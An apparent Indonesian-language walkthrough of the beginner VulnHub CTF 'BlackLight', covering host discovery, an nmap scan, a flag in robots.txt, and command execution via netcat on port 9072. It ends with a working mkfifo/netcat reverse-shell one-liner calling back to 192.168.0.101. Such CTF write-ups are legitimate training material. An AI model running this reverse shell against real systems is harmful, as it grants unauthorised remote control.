BlackLight - VulnHub CTF Challenge #1

Blacklight adalah tantangan CTF tingkat pemula. VM tersedia di VulnHub. Tantangan ini sangat mudah dan singkat dibandingkan dengan Tantangan VulnHub lainnya.

Impor VM ke Virtualbox dan hidupkan.

Gunakan netdiscover untuk menentukan IP

sudo netdiscover -i wlan0 -r 192.168.0.1/24

Sekarang, edit file “/ etc / hosts” Kamu untuk mendaftarkan IP ini ke DNS lokal Kamu

sudo nano /etc/hosts

 Jalankan port pada Nmap Scan.

nmap -p- bl.local

Ada Server HTTP berjalan dan port yang tidak dikenal terbuka. Pertama, Periksa Server HTTP

Kode sumber halaman web default tidak mengungkapkan apa pun, mari kita periksa "robots.txt".

robots.txt ”mengungkapkan bendera pertama kami ditambah petunjuk yang menunjuk pada port 9072 yang sebelumnya kami temukan menggunakan Nmap. Sekarang, mari sambungkan ke port tersebut menggunakan Netcat.

nc -v bl.local 9072

 ".Help" mengungkapkan bahwa kita dapat menjalankan perintah di shell, mari kita jalankan shell reverse Netcat kita dari PentestMonkey.

nc -nlvp 1234

dan kemudian jalankan shell reverse berikut.

exec `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.101 1234 >/tmp/f`

 Lihat Shell Nya Sudah Di Eksekusi

Bagikan Artikel ini